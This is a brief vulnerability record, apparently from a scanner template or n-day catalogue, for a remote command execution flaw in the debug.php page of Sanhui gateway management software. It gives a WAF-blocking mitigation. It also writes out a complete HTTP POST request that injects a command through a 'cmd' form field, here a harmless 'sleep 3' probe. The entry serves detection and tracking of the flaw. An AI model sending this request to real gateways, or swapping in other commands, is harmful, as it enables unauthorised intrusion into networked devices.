vendor = "三汇"
name = "三汇网关管理软件debug.php远程命令执行漏洞"
type = "RCE"
version = "未知"
path = "/debug.php"
detail = "POST /debug.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb Content-Disposition: form-data; name=\"comdtype\" 1 ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb Content-Disposition: form-data; name=\"cmd\" sleep 3 ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb Content-Disposition: form-data; name=\"run\" ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0812"
label = "nday"
